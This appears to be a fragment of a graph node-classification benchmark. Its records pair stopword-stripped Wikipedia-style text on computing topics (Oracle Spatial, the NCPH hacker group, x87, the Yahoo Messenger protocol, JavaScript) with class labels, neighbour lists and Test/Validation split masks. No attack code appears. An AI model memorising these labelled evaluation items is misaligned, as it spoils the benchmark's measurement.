    "text": "Oracle_Spatial_and_Graph:oracle spatial graph oracle spatial graph formerly oracle spatial forms separately-licensed option component oracle database spatial features oracle spatial graph aid users managing geographic location-data native type within oracle database potentially supporting wide range applications — automated mapping facilities management geographic information systems am/fm/gis wireless location services location-enabled e-business graph features oracle spatial graph include oracle network data model ndm graphs used traditional network applications major transportation telcos utilities energy organizations rdf semantic graphs used social networks social interactions linking disparate data sets address requirements research health sciences finance media intelligence communities geospatial feature oracle spatial graph provides sql schema functions facilitate storage retrieval update query collections spatial features oracle database spatial component spatial feature consists geometric representation shape coordinate space — referred geometry oracle spatial geospatial data features consist network data model feature property graph model used model analyze physical logical networks used industries transportation logistics utilities features include rdf semantic graph feature supports world wide web consortium w3c rdf standards provides rdf data management querying inferencing commonly used variety applications ranging semantic data integration social network analysis linked open data applications features include oracle spatial graph option oracle enterprise edition must licensed separately also included oracle database cloud service high performance edition extreme performance edition included oracle standard edition oracle standard edition one however latter two editions allow use subset spatial features called oracle locator extra cost appendix oracle spatial graph developer guide specifies functions allowed locator oracle rdbms first incorporated spatial-data capability modification oracle 4 made scientists working canadian hydrographic service chs joint development team chs oracle personnel subsequently redesigned oracle kernel resulting spatial data option sdo oracle 7 sdo_ prefix continues use within oracle spatial implementations spatial indexing system sdo involved adaptation riemannian hypercube data-structures invoking helical spiral 3-dimensional space allows n-size features also permitted highly efficient compression resulting data suitable petabyte-size data repositories chs major corporate users required also improving search retrieval times helical hyperspatial code hhcode developed chs implemented oracle spatial comprises form space-filling curve oracle 8 oracle corporation marketing dubbed spatial extension simply oracle spatial primary spatial indexing system longer uses hhcode standard r-tree index since july 2012 option named oracle spatial graph highlight graph database capabilities product network data model graph introduced oracle database 10g release 1 rdf semantic graph introduced oracle database 10g release 2 oracle documentation library http //www.oracle.com/pls/db121/portal.portal_db selected=7 frame= see",
    "neighbors": [
      5632,
      10145,
      11651,
      10340,
      6629,
      6953,
      10505,
      5612,
      10413,
      7983,
      10452,
      4058,
      7868,
      10525,
      9631
    ],
    "mask": "Test"
  },
  {
    "node_id": 3455,
    "label": 4,
    "text": "Network_Crack_Program_Hacker_Group:network crack program hacker group network crack program hacker group ncph group chinese hacker group based zigong sichuan province group first gained notoriety hacking 40 hacker association websites china attacks grew sophistication notoriety 2006 received international media attention early 2007. idefense linked ginwui rootkit developed leader tan dailin wicked rose attacks us department defense may june 2006. idefense linked group many 35 zero-day hacker proof-of-concept codes used attacks period 90 days summer 2006 also known remote-network-control programs offer download wicked rose announced blog post group paid work group sponsor unknown group four core members 2006 wicked rose kungbim charles rodag approximately 10 members total group current membership unknown wicked rose also known meigui 玫瑰 pseudonym chinese hacker tan dailin first noted hacker patriotic attacks 2001 2005 wicked rose contracted sichuan military command communication department instructed participate chengdu military command network attack/defense competition winning local competition received month intense training simulating attacks designing hacking tools drafting network-infiltration strategies team represented sichuan military command competition provinces went win wicked rose also credited development ginwui rootkit used attacks us department defense 2006 group leader responsible managing relationships sponsors paying ncph members work april 2009 arrested committing distributed denial service attacks hackbase hackerxfiles 3800hk possibly purpose committing blackmail organizations attacked collected information attack turned public security department authorities conducted investigation shut website hackbase reported wicked rose arrested faces 7 years prison group expelled hacker wzt 20 may 2006 although cause unknown group ejected soon zero-day attacks publicly disclosed wzt coding expert within group former ncph member associates chinese hacker li0n founder honker union china huc wicked rose credits chinese hacker whg also known fig one developers ginwui rootkit whg expert malicious code security firms researching wicked rose activities connected chinese hacker group evil security team group known remote-network-control programs offer free website exploitation zero-day vulnerabilities microsoft office suite products founding 2004 group earned reputation among hacking groups hacking 40 hacker association websites china wicked rose creator ginwui rootkit code support posts chinese hacker message boards also available ncph blog security researchers discovered rootkit 18 may 2006 attackers utilized attacks us japan attackers introduced us attack department defense entity used two different versions rootkit attacks may june 2006 according f-secure ginwui fully featured backdoor rootkit characteristics distributed word documents backdoor ginwui creates allows controlling hacker control certain processes compromised computer including ability idefense links ncph many 35 zero-day proof-of-concept codes used attacks microsoft office products period 90 days summer 2006 due use malware developed wicked rose available public domain time group graduated early attacks exploiting microsoft word end 2006 also using power point excel attacks ncph utilizes exploits spear phishing attacks blog wicked rose discussed preference spear phishing attacks first collection phase information gathered using open source information employee databases mailboxes company system may also conduct analysis user id allows track understand activities finally conducts attack using information collected someone likely open infected document spear phishing attacks attributed ncph increased sophistication time phishing attacks beginning 2006 targeted large numbers employees one attack attributed group later year targeted one individual us oil company using socially engineered emails infected power point documents winning military network attack/defense competition group obtained sponsor paid 2000 rmb per month idefense believes sponsor likely people liberation army pla definitive evidence support claim 2006 attacks took place sponsor increased pay 5000 rmb group current sponsor unknown time reporter simon elegant interviewed eight members group december 2007 part article chinese government cyber operations us government interview members referred using code names security firm idefense published reports group exploits devoted webinar group capabilities relationships chinese hackers scott henderson chinese linguistics chinese hacker expert also devoted several blog posts group ongoing activities four core members group blogged activities one point another group blog ncph.net also offered network-infiltration programs download scott henderson describes wicked rose early blog posts revealing damning thing ever seen chinese hacker write interview time reporter wicked rose took group blog blog july 2008 group blog returned modified content withered rose also began blogging saying busy time blog new job allows time blog chinese officials removed blogs arrest april 2009 rodag also blogs recent post august 2008 last post ie vulnerabilities attackers used exploit user desktop",
    "neighbors": [
      11511,
      7515,
      9791
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3456,
    "label": 4,
    "text": "Budapest_Declaration_on_Machine_Readable_Travel_Documents:budapest declaration machine readable travel documents budapest declaration machine readable travel documents declaration issued future identity information society fidis network excellence raise concern public risks associated security architecture related management machine readable travel documents mrtds current implementation passports european union creates threats related identity theft privacy declaration proclaimed budapest september 2006",
    "neighbors": [
      10685
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3457,
    "label": 3,
    "text": "Execution_unit:execution unit computer engineering execution unit also called functional unit part central processing unit cpu performs operations calculations instructed computer program may internal control sequence unit confused cpu main control unit registers internal units arithmetic logic unit alu address generation unit agu floating-point unit fpu load-store unit lsu branch execution unit beu smaller specific components common modern cpus multiple parallel execution units referred superscalar design simplest arrangement use one bus manager manage memory interface others perform calculations additionally modern cpus execution units usually pipelined",
    "neighbors": [
      7173,
      9739,
      2066,
      7699,
      5655,
      1563,
      10779,
      10781,
      6181,
      8231,
      10796,
      3630,
      6705,
      7218,
      2623,
      2113,
      7234,
      3142,
      2638,
      1122,
      7269,
      3175,
      8815,
      630,
      8822,
      9851,
      6268,
      3197,
      7313,
      2708,
      6815,
      8352,
      5793,
      6818,
      6821,
      7852,
      9391,
      2224,
      2226,
      7858,
      9911,
      8890,
      4286,
      2241,
      2243,
      9932,
      5329,
      10966,
      731,
      11487,
      7911,
      10985,
      9964,
      5358,
      1776,
      8944,
      757,
      2805,
      3317,
      10485,
      249,
      8700,
      1798,
      1801,
      780,
      6926,
      6415,
      1298,
      11539,
      3352,
      7963,
      1309,
      2339,
      6950,
      3886,
      309,
      8501,
      5948,
      4928,
      8514,
      4423,
      6476,
      2383,
      7505,
      9044,
      11604,
      344,
      8543,
      1376,
      9057,
      10603,
      4465,
      10612,
      1399,
      7033,
      1402,
      398,
      3470,
      5518,
      5523,
      407,
      409,
      1952,
      10658,
      3493,
      9126,
      10669,
      1967,
      2480,
      10675,
      1461,
      1463,
      7607,
      4030,
      453,
      3014,
      1998,
      5073,
      466,
      1499,
      10205,
      1502,
      7134,
      5090,
      995,
      7653,
      10725,
      1000,
      9707,
      8684,
      10734,
      6639,
      7151,
      9714,
      499,
      4596,
      10746,
      508
    ],
    "mask": "Test"
  },
  {
    "node_id": 3458,
    "label": 2,
    "text": "Open_Source_and_Linux_Organization:open source linux organization hewlett-packard open source linux organization earlier known hp linux group 100 linux programmers 300 products free software released 300 open source printer drivers",
    "neighbors": [
      7938,
      7812,
      8326,
      4360,
      5384,
      4493,
      2195,
      11155,
      1813,
      10780,
      1694,
      3618,
      4011,
      9646,
      823,
      9660,
      10817,
      5067,
      8147,
      1761,
      4841
    ],
    "mask": "None"
  },
  {
    "node_id": 3459,
    "label": 3,
    "text": "X87:x87 x87 floating-point-related subset x86 architecture instruction set originated extension 8086 instruction set form optional floating-point coprocessors worked tandem corresponding x86 cpus microchips names ending 87 also known npx numeric processor extension like extensions basic instruction set x87 instructions strictly needed construct working programs provide hardware microcode implementations common numerical tasks allowing tasks performed much faster corresponding machine code routines x87 instruction set includes instructions basic floating-point operations addition subtraction comparison also complex numerical operations computation tangent function inverse example x86 processors since intel 80486 x87 instructions implemented main cpu term sometimes still used refer part instruction set x87 instructions standard pcs compilers programmers use rather slow library calls perform floating-point operations method still common low-cost embedded systems x87 registers form 8-level deep non-strict stack structure ranging st 0 st 7 registers directly accessed either operand using offset relative top well pushed popped scheme may compared stack frame may pushed/popped indexed instructions push calculate pop values top stack unary operations fsqrt fptan etc implicitly address topmost st 0 binary operations fadd fmul fcom etc implicitly address st 0 st 1 non-strict stack model also allows binary operations use st 0 together direct memory operand explicitly specified stack register st x role similar traditional accumulator combined destination left operand also reversed instruction-by-instruction basis st 0 unmodified operand st x destination furthermore contents st 0 exchanged another stack register using instruction called fxch st x properties make x87 stack usable seven freely addressable registers plus dedicated accumulator seven independent accumulators especially applicable superscalar x86 processors pentium 1993 later exchange instructions codes d9c8..d9cf optimized zero clock penalty using one integer paths fxch st x parallel fpu instruction despite natural convenient human assembly language programmers compiler writers found complicated construct automatic code generators schedule x87 code effectively stack-based interface potentially minimize need save scratch variables function calls compared register-based interface although historically design issues original implementation limited potential x87 provides single-precision double-precision 80-bit double-extended precision binary floating-point arithmetic per ieee 754-1985 standard default x87 processors use 80-bit double-extended precision internally allow sustained precision many calculations see ieee 754 design rationale given sequence arithmetic operations may thus behave slightly differently compared strict single-precision double-precision ieee 754 fpu may sometimes problematic semi-numerical calculations written assume double precision correct operation avoid problems x87 configured using special configuration/status register automatically round single double precision operation since introduction sse2 x87 instructions essential remain important high-precision scalar unit numerical calculations sensitive round-off error requiring 64-bit mantissa precision extended range available 80-bit format clock cycle counts examples typical x87 fpu instructions register-register versions shown ... b notation minimum maximum covers timing variations dependent transient pipeline status arithmetic precision chosen 32 64 80 bits also includes variations due numerical cases number set bits zero etc. l → h notation depicts values corresponding lowest l highest h maximal clock frequencies available companies designed manufactured floating-point units compatible intel 8087 later models include amd 287 387 486dx 5x86 k5 k6 k7 k8 chips technologies super math coprocessors cyrix fasmath cx87slc cx87dlc etc. 6x86 cyrix mii fujitsu early pentium mobile etc harris semiconductor manufactured 80387 486dx processors ibm various 387 486 designs idt winchip c3 c7 nano etc iit 2c87 3c87 etc lc technology green math coprocessors national semiconductor geode gx1 geode gxm etc nexgen nx587 rise technology mp6 st microelectronics manufactured 486dx 5x86 etc texas instruments manufactured 486dx processors etc transmeta tm5600 tm5800 ulsi math·co coprocessors via c3 c7 nano etc xtend 83s87sx-25 coprocessors 8087 first math coprocessor 16-bit processors designed intel built paired intel 8088 8086 microprocessors intel earlier 8231 8232 floating-point processors marketed use i8080 cpu fact licensed versions amd am9511 am9512 fpus 1977 1979 80187 80c187 math coprocessor intel 80186 cpu incapable operating 80188 80188 8-bit data bus 80188 use 8087 80187 appear time 80186 80188 fact launched 80287 80387 although interface main processor 8087 core 80387 thus fully ieee 754-compliant capable executing 80387 extra instructions 80287 i287 math coprocessor intel 80286 series microprocessors intel models included variants specified upper frequency limits ranging 6 12 mhz later followed i80287xl 387 microarchitecture i80287xlt special version intended laptops well variants 80287xl actually 80387sx 287 pinout contains internal 3/2 multiplier motherboards ran coprocessor 2/3 cpu speed could instead run fpu speed cpu 287 models 387-like performance intel 80c287 built using chmos iii amd 80ec287 manufactured amd cmos process using fully static gates 80287 80287xl work 80386 microprocessor initially coprocessors available 80386 introduction 80387 1987 finally able work cyrix cx486slc however chips 80387 strongly preferred higher performance greater capability instruction set 80387 387 i387 first intel coprocessor fully compliant ieee 754-1985 standard released 1987 full two years 386 chip i387 includes much improved speed intel previous 8087/80287 coprocessors improved characteristics trigonometric functions 8087 80287 fptan fpatan instructions limited argument range ±π/4 ±45° 8087 80287 direct instructions sin cos functions without coprocessor 386 normally performs floating-point arithmetic relatively slow software routines implemented runtime software exception handler math coprocessor paired 386 coprocessor performs floating-point arithmetic hardware returning results much faster emulating software library call i387 compatible standard i386 chip 32-bit processor bus later cost-reduced i386sx narrower 16-bit data bus interface i387 32-bit bus i386sx requires coprocessor 80387sx compatible sx narrower 16-bit data bus i487sx p23n marketed floating-point unit coprocessor intel i486sx machines actually contained full-blown i486dx implementation installed i486sx system i487 disabled main cpu took cpu operations i487 took measures detect presence i486sx would function without original cpu place nx587 last fpu x86 manufactured separately cpu case nexgen nx586",
    "neighbors": [
      5380,
      1029,
      1798,
      3973,
      6151,
      7173,
      5386,
      8325,
      4108,
      1677,
      6924,
      6415,
      9095,
      5649,
      9611,
      5523,
      6804,
      8851,
      4886,
      9111,
      3352,
      5883,
      1952,
      6815,
      6821,
      2088,
      3883,
      10669,
      9391,
      9137,
      4276,
      1461,
      10548,
      2237,
      5309,
      8125,
      8126,
      6339,
      5444,
      585,
      1998,
      2638,
      3323,
      977,
      5073,
      5326,
      5844,
      477,
      7134,
      2655,
      1119,
      1000,
      7657,
      4204,
      1005,
      5356,
      5871,
      8684,
      9741,
      499,
      8820,
      3317,
      4603,
      4217,
      8186,
      1915,
      7421,
      5503
    ],
    "mask": "Test"
  },
  {
    "node_id": 3460,
    "label": 5,
    "text": "Yahoo!_Messenger_Protocol:yahoo messenger protocol yahoo messenger protocol ymsg underlying network protocol used yahoo messenger instant messaging client yahoo instant messager supports many features beyond messaging including off-line messaging file transfer chat conferencing voice chat webcams avatars ymsg protocol provides language series conventions software communicating yahoo instant messaging service essence ymsg performs role yahoo im http world wide web unlike http however ymsg proprietary protocol closed standard aligned yahoo messaging service rival messaging services protocols based open standards others proprietary effectively fulfilling role different mechanics one fundamental tenets instant messaging notion users see someone connected network—known industry 'presence ymsg protocol uses mechanics standard internet connection achieve presence—the connection uses send receive data order user remain 'visible users service thereby signaling availability yahoo im client software must maintain functional open network connection linking client yahoo im servers organizations block communication port used yahoo im either choose whitelist certain types internet usage web surfing email example seek blacklist instant messaging services yahoo provides alternative route connecting service mimics http protocol used world wide web however http inherent sense persistent connection yahoo instead relies client frequently contacting server order approximate sense connection required give user presence im network originally ymsg login procedure suffered security flaw known replay attack given password authentication information always identically scrambled sent across network allowed attacker witnesses transmission merely reproduce message verbatim order successfully log without actually needing know original password details generated time around 2000 2001 yahoo upgraded service introduce random element login attempt defeating potential replay attacks exception login authentication details data sent ymsg connection encrypted ymsg uses binary format text portions data transmitted plain view therefore difficult attacker seize control yahoo im account quite easy read messages sent account holder along details list friends attacker control one computers data routed ymsg protocol communicates client application server using tcp/ip connection port 5050 default ports may used port blocked alternatively http route available clients behind well-secured firewall http requests used upload messages client downloading messages accumulated server since last request client remains logged long tcp/ip connection kept open case client connected via http client fails send request time 'ping messages sent every thirty seconds ymsg packets consist twenty byte header consists four bytes ymsg two bytes version current version 19 two bytes vendor id typically 0 two bytes packet length content include 20 byte header two bytes service type ymsg packet 4 bytes status related buddy status though used log invisible four bytes session id rest packet variable length table key/value pairs key ascii representation numeric code representing field type value associated data two byte separator hexadecimal values c0 80 used delimit entry table parts ymsg rely protocols example file transfer initially negotiated using ymsg actual transfer file done via http webcams also use ymsg discover request permission view http actually feed jpeg 2000 images one client another chatroom categories rooms lobbies retrieved using http xml documents regular webcam connections use h.323 yahoo voice uses sip calls voip handled indirectly yahoo servers chat client direct access yahoo chat conference voice however use older form audio compression called truespeech developed dsp group chatroom categories retrieved login process multi-step process spans two protocols client successfully establishing tcp connection ymsg server sends authentication packet contains user name user wishes log ymsg server ymsg server responds authentication packet containing challenge string key/value field 96 https process starts connecting login.yahoo.com sending token_get string constructed username password account client trying log https response token login successful contain token string another https request sent login.yahoo.com token_login constructed token successful response contain three strings crumb tcookie ycookie client combines crumb challenge strings performs md5 hash combined string converts resulting 16-byte value base64 string performs negligible amount manipulation resulting base64 string making three character replacements '+ '= '- '/ resultant base64 string used building authenticationresponse packet whose key 307 contains resultant base64 string value client sends authenticationresponse packet authenticationresponse packet successful client receive list listv15 statusv15 newmail ping number y7 buddy authorization message packets offline messages buddy requests list packet contains aliases user accounts yahooid listv15 contains users friends groups ignored user list statusv15 packet contains users listv15 online busy idle well status messages users may potentially string represents resource another http server user display image",
    "neighbors": [
      10242,
      5251,
      5382,
      4746,
      1036,
      11408,
      3228,
      8735,
      10271,
      3105,
      9511,
      1962,
      9519,
      8758,
      1467,
      6208,
      1218,
      2760,
      2892,
      4318,
      479,
      3812,
      4068,
      6628,
      488,
      7407,
      8692,
      4085,
      8694,
      119,
      7928,
      10748
    ],
    "mask": "Test"
  },
  {
    "node_id": 3461,
    "label": 4,
    "text": "Source_code_virus:source code virus source code viruses subset computer viruses make modifications source code located infected machine source file overwritten includes call malicious code targeting generic programming language c source code viruses portable source code viruses rare partly due difficulty parsing source code programmatically reported exist",
    "neighbors": [
      7515,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 3462,
    "label": 9,
    "text": "JavaScript:javascript javascript often abbreviated js high-level interpreted scripting language conforms ecmascript specification javascript curly-bracket syntax dynamic typing prototype-based object-orientation first-class functions alongside html css javascript one core technologies world wide web javascript enables interactive web pages essential part web applications vast majority websites use major web browsers dedicated javascript engine execute multi-paradigm language javascript supports event-driven functional imperative including object-oriented prototype-based programming styles apis working text arrays dates regular expressions dom language include i/o networking storage graphics facilities relies upon host environment embedded provide features initially implemented client-side web browsers javascript engines embedded many types host software including server-side web servers databases non-web programs word processors pdf software runtime environments make javascript available writing mobile desktop applications including desktop widgets terms vanilla javascript vanilla js refer javascript extended frameworks additional libraries scripts written vanilla js plain javascript code although similarities javascript java including language name syntax respective standard libraries two languages distinct differ greatly design javascript influenced programming languages self scheme json serialization format used store data structures files transmit across networks based javascript 1993 national center supercomputing applications ncsa unit university illinois urbana-champaign released ncsa mosaic first popular graphical web browser played important part expanding growth nascent world wide web beyond nextstep niche worldwideweb formed three years earlier 1994 company called mosaic communications founded mountain view california employed many original ncsa mosaic authors create mosaic netscape however intentionally shared code ncsa mosaic internal codename company browser mozilla portmanteau mosaic godzilla first version web browser mosaic netscape 0.9 released late 1994 within four months already taken three-quarters browser market became main web browser 1990s avoid trademark ownership problems ncsa browser subsequently renamed netscape navigator year company took name netscape communications netscape communications realized web needed become dynamic marc andreessen founder company believed html needed glue language easy use web designers part-time programmers assemble components images plugins code could written directly web page markup 1995 netscape communications recruited brendan eich goal embedding scheme programming language netscape navigator could get started netscape communications collaborated sun microsystems include sun static programming language java netscape navigator compete microsoft user adoption web technologies platforms netscape communications decided scripting language wanted create would complement java similar syntax excluded adopting languages perl python tcl scheme defend idea javascript competing proposals company needed prototype eich wrote one 10 days may 1995 although developed name mocha language officially called livescript first shipped beta releases netscape navigator 2.0 september 1995 renamed javascript deployed netscape navigator 2.0 beta 3 december final choice name caused confusion giving impression language spin-off java programming language choice characterized marketing ploy netscape give javascript cachet hot new web programming language common misconception javascript influenced earlier web page scripting language developed nombas named cmm confused later c -- created 1997 brendan eich however never heard cmm created livescript nombas pitch embedded web page scripting netscape though web page scripting new concept shown violawww web browser nombas later switched offering javascript instead cmm scriptease product part tc39 group standardized ecmascript december 1995 soon releasing javascript browsers netscape introduced implementation language server-side scripting netscape enterprise server since 1996 iis web-server supported microsoft implementation server-side javascript—jscript—in asp .net pages since mid-2000s additional server-side javascript implementations introduced node.js 2009 microsoft script technologies including vbscript jscript released 1996 jscript reverse-engineered implementation netscape javascript part internet explorer 3 jscript also available server-side scripting internet information server internet explorer 3 also included microsoft first support css various extensions html case implementation noticeably different found netscape navigator time differences made difficult designers programmers make single website work well browsers leading use best viewed netscape best viewed internet explorer logos characterized early years browser wars javascript began acquire reputation one roadblocks cross-platform standards-driven web developers took difficult task trying make sites work major browsers many could afford time release internet explorer 4 microsoft introduced concept dynamic html differences language implementations different proprietary document object models remained obstacles widespread take-up javascript web november 1996 netscape submitted javascript ecma international carve standard specification browser vendors could implement based work done netscape led official release language specification ecmascript published first edition ecma-262 standard june 1997 javascript well known implementations actionscript jscript well-known implementations ecmascript release ecmascript 2 june 1998 continued standards process cycle conforming modifications iso/iec 16262 international standard ecmascript 3 released december 1999 modern-day baseline javascript original ecmascript 4 work led waldemar horwat netscape google started 2000 microsoft initially participated implemented proposals jscript .net language time clear microsoft intention cooperating implementing proper javascript internet explorer even though competing proposal partial diverged point implementation .net server side 2003 original ecmascript 4 work mothballed next major event 2005 two major happenings javascript history first brendan eich mozilla rejoined ecma international not-for-profit member work started ecmascript xml e4x ecma-357 standard came ex-microsoft employees bea systems originally acquired crossgain led working jointly macromedia later acquired adobe systems implementing e4x actionscript 3 actionscript 3 fork original ecmascript 4 along macromedia work restarted ecmascript 4 goal standardizing actionscript 3 end adobe systems released actionscript virtual machine 2 code named tamarin open source project tamarin actionscript 3 different web javascript converge realized parties 2007 2008 alas still turmoil various players douglas crockford—then yahoo —joined forces microsoft 2007 oppose ecmascript 4 led ecmascript 3.1 effort development ecmascript 4 never completed work influenced subsequent versions happening open source developer communities set work revolutionize could done javascript community effort sparked 2005 jesse james garrett released white paper coined term ajax described set technologies javascript backbone used create web applications data loaded background avoiding need full page reloads leading dynamic applications resulted renaissance period javascript usage spearheaded open source libraries communities formed around libraries prototype jquery dojo toolkit mootools others released july 2008 disparate parties either side came together oslo led eventual agreement early 2009 rename ecmascript 3.1 ecmascript 5 drive language forward using agenda known harmony ecmascript 5 finally released december 2009 june 2011 ecmascript 5.1 released fully align third edition iso/iec 16262 international standard ecmascript 2015 released june 2015 ecmascript 2016 released june 2016 current version ecmascript 2017 released june 2017 javascript become one popular programming languages web however many professional programmers initially denigrated language due perceived target audience web authors amateurs advent ajax returned javascript spotlight brought professional programming attention result proliferation comprehensive frameworks libraries improved javascript programming practices increased usage javascript outside web browsers seen proliferation server-side javascript platforms january 2009 commonjs project founded goal specifying common standard library mainly javascript development outside browser rise single-page applications javascript-heavy sites increasingly used compile target source-to-source compilers dynamic languages static languages javascript trademark oracle corporation united states used license technology invented implemented netscape communications current entities mozilla foundation following features common conforming ecmascript implementations unless explicitly specified otherwise popular modern web browsers support javascript built-in interpreters javascript supports much structured programming syntax c e.g. codice_1 statements codice_2 loops codice_3 statements codice_4 loops etc. one partial exception scoping javascript originally function scoping codice_5 ecmascript 2015 added keywords codice_6 codice_7 block scoping meaning javascript function block scoping like c javascript makes distinction expressions statements one syntactic difference c automatic semicolon insertion allows semicolons would normally terminate statements omitted javascript almost entirely object-based javascript object associative array augmented prototype see string key provides name object property two syntactical ways specify name dot notation codice_9 bracket notation codice_10 property may added rebound deleted run-time properties object property belongs object prototype inheritance chain enumerated using codice_11 loop javascript small number built-in objects including codice_12 codice_13 function first-class function considered object function may properties methods codice_23 codice_24 nested function function defined within another function created time outer function invoked addition nested function forms lexical closure lexical scope outer function including constant local variable argument value becomes part internal state inner function object even execution outer function concludes javascript also supports anonymous functions javascript supports implicit explicit delegation javascript officially managed mozilla foundation new language features added periodically however javascript engines support new features variables javascript defined using either codice_5 codice_6 codice_7 keywords var x // declares variable x assigns special value undefined confused undefined value var 2 // declares variable assigns value 2 var z hello world // declares variable z assigns string containing hello world note comments example preceded two forward slashes built-in input/output functionality javascript run-time environment provides ecmascript specification edition 5.1 mentions indeed provisions specification input external data output computed results however runtime environments codice_38 object used print output minimalist hello world program javascript console.log hello world simple recursive function function factorial n factorial 3 // returns 6 anonymous function lambda function counter var closure counter closure // returns 1 closure // returns 2 closure // returns 3 example shows javascript function closures capture non-local variables reference arrow functions first introduced 6th edition ecmascript 2015 shorten syntax writing functions javascript arrow functions anonymous nature variable needed refer order invoke creation example arrow function // arrow functions let us omit function keyword long_example // points anonymous function value const long_example input1 input2 // arrow functions also let us automatically return expression right // arrow input 5 omitting braces return keyword const short_example input input 5 long_example 2 3 // prints hello world returns 5. short_example 2 // returns 7 javascript objects created way functions known function object object example function ball r var myball new ball 5 // creates new instance ball object radius 5 myball.show // instance ball object show function performed variadic function demonstration codice_30 special variable function sum sum 1 2 // returns 3 sum 1 2 3 // returns 6 immediately-invoked function expressions often used create modules ecmascript 2015 built-in module construct language modules allow gathering properties methods namespace making private var counter function // module counter.get // shows 0 counter.set 6 counter.increment // shows 7 counter.increment // shows 8 exporting importing modules javascript export example /* mymodule.js */ // function remains private exported let sum b // export variables export var name 'alice export let age 23 // export named functions export function add num1 num2 // export class export class multiplication import example // import one property import add './mymodule.js console.log add 1 2 // 3 // import multiple properties import name age './mymodule.js console.log name age // alice 23 // import properties module import './module.js' console.log name age // alice 23 console.log add 1,2 // 3 sample code displays various javascript features /* finds lowest common multiple lcm two numbers */ function lcmcalculator x // constructor function // prototype object instances created constructor // constructor prototype property lcmcalculator.prototype // object literal // define generic output function implementation works web browsers function output x // note array map foreach defined javascript 1.6 // used demonstrate javascript inherent functional nature .map function pair // array literal mapping function function printresult obj following output displayed browser window lcmcalculator 28 b 56 gcd 28 lcm 56 lcmcalculator 21 b 56 gcd 7 lcm 168 lcmcalculator 25 b 55 gcd 5 lcm 275 lcmcalculator 22 b 58 gcd 2 lcm 638 94.5 10 million popular web pages used javascript common use javascript add client-side behavior html pages also known dynamic html dhtml scripts embedded included html pages interact document object model dom page simple examples usage javascript code run locally user browser rather remote server increasing application overall responsiveness user actions javascript code also detect user actions html alone individual keystrokes applications gmail take advantage much user-interface logic written javascript javascript dispatches requests information content e-mail message server wider trend ajax programming similarly exploits strength javascript engine also known javascript interpreter javascript implementation interpreter interprets javascript source code executes script accordingly first javascript engine created brendan eich netscape netscape navigator web browser engine code-named spidermonkey implemented c. since updated javascript 1.5 conform ecmascript 3 rhino engine created primarily norris boyd formerly netscape google javascript implementation java rhino like spidermonkey ecmascript 3 compliant web browser common host environment javascript however web browser execute javascript code example text-based browsers javascript engines users browsers may disable scripts preference extension web browser typically creates host objects represent dom javascript web server another common host environment javascript web server would typically expose host objects representing http request response objects javascript program could interrogate manipulate dynamically generate web pages javascript language popular browsers share support inadvertently become target language frameworks languages increasing speed javascript engines made language feasible compilation target despite performance limitations inherent dynamic nature minimal example standards-conforming web page containing javascript using html 5 syntax dom doctype html html /html javascript runs widely varying environments important part testing debugging test verify javascript works across multiple browsers dom interfaces officially defined w3c standardization effort separate javascript implementation dom interfaces differ web browsers javascript authors deal differences writing standards-compliant code executed correctly browsers failing write code behaves differently absence certain browser features authors may also find practical detect browser running two browsers may implement feature differing behavior libraries toolkits take browser differences account also useful programmers furthermore scripts may work users example user may support users web authors try create pages degrade gracefully user agents browsers support page javascript particular page remain usable albeit without extra features javascript would added sites use html codice_40 tag contains alt content js disabled alternative approach many find preferable first author content using basic technologies work browsers enhance content users javascript enabled javascript dom provide potential malicious authors deliver scripts run client computer via web browser authors minimize risk using two restrictions first scripts run sandbox perform web-related actions general-purpose programming tasks like creating files second scripts constrained same-origin policy scripts one web site access information usernames passwords cookies sent another site javascript-related security bugs breaches either origin policy sandbox subsets general javascript—adsafe secure ecmascript ses —that provide greater levels security especially code created third parties advertisements caja another project safe embedding isolation third-party javascript html content security policy main intended method ensuring trusted code executed web page common javascript-related security problem cross-site scripting xss violation same-origin policy xss vulnerabilities occur attacker able cause target web site online banking website include malicious script webpage presented victim script example access banking application privileges victim potentially disclosing secret information transferring money without victim authorization solution xss vulnerabilities use html escaping whenever displaying untrusted data browsers include partial protection reflected xss attacks attacker provides url including malicious script however even users browsers vulnerable xss attacks malicious code stored database correct design web applications server side fully prevent xss xss vulnerabilities also occur implementation mistakes browser authors another cross-site vulnerability cross-site request forgery csrf csrf code attacker site tricks victim browser taking actions user intend target site like transferring money bank target sites rely solely cookies request authentication requests originating code attacker site carry valid login credentials initiating user general solution csrf require authentication value hidden form field cookies authenticate request might lasting effects checking http referrer header also help javascript hijacking type csrf attack codice_29 tag attacker site exploits page victim site returns private information json javascript possible solutions include developers client-server applications must recognize untrusted clients may control attackers application author assume javascript code run intended secret embedded code could extracted determined adversary implications package management systems npm bower popular javascript developers systems allow developer easily manage program dependencies upon developer program libraries developers trust maintainers libraries keep secure date always case vulnerability emerged blind trust relied-upon libraries new releases cause bugs vulnerabilities appear programs rely upon libraries inversely library go unpatched known vulnerabilities wild study done looking sample 133k websites researchers found 37 websites included library at-least one known vulnerability median lag oldest library version used website newest available version library 1,177 days alexa development libraries still active use ceased years ago another possibility maintainer library may remove library entirely occurred march 2016 azer koçulu removed repository npm caused tens thousands programs websites depending upon libraries break javascript provides interface wide range browser capabilities may flaws buffer overflows flaws allow attackers write scripts would run code wish user system code means limited another javascript application example buffer overrun exploit allow attacker gain access operating system api superuser privileges flaws affected major browsers including firefox internet explorer safari plugins video players adobe flash wide range activex controls enabled default microsoft internet explorer may also flaws exploitable via javascript flaws exploited past windows vista microsoft attempted contain risks bugs buffer overflows running internet explorer process limited privileges google chrome similarly confines page renderers sandbox web browsers capable running javascript outside sandbox privileges necessary example create delete files privileges intended granted code web incorrectly granting privileges javascript web played role vulnerabilities internet explorer firefox windows xp service pack 2 microsoft demoted jscript privileges internet explorer microsoft windows allows javascript source files computer hard drive launched general-purpose non-sandboxed programs see windows script host makes javascript like vbscript theoretically viable vector trojan horse although javascript trojan horses uncommon practice 2015 javascript-based proof-of-concept implementation rowhammer attack described paper security researchers 2017 javascript-based attack via browser demonstrated could bypass aslr called aslr⊕cache anc addition web browsers servers javascript interpreters embedded number tools applications provides object model provides access host environment core javascript language remains mostly application within javascript access debugger becomes invaluable developing large non-trivial programs implementation differences various browsers particularly within dom useful access debugger browsers web application targets script debuggers integrated within many mainstream browsers internet explorer firefox safari google chrome opera node.js addition native internet explorer developer tools three debuggers available internet explorer microsoft visual studio features three closely followed microsoft script editor component microsoft office finally free microsoft script debugger free microsoft visual web developer express provides limited version javascript debugging functionality microsoft visual studio comparison internet 